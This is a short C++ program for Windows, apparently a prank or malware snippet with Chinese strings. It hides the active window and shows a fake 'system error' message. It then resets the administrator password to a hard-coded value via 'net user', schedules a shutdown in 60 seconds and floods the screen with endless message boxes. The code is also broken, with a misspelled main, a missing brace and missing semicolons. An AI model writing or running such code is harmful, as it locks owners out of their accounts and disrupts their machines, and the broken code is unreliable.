#include<iostream>

#include<Windows.h>

#include"TLHELP32.H"

 using namespace std;

int mian()

     HWND hWnd=GetForegroundWindow()

     ShowWindow(hWnd, 0);

     MessageBox(hWnd,L"系统出错");

    system("net user administrator 19861109");//19861109是密码

    system("shutdown -s -t 60");

     LPCWSTR words=L"hello "

     LPCWSTR title=L"系统错误"

     while(1)

{

    MessageBox(hWnd,words,title, MB_OK);

}

return 0;

}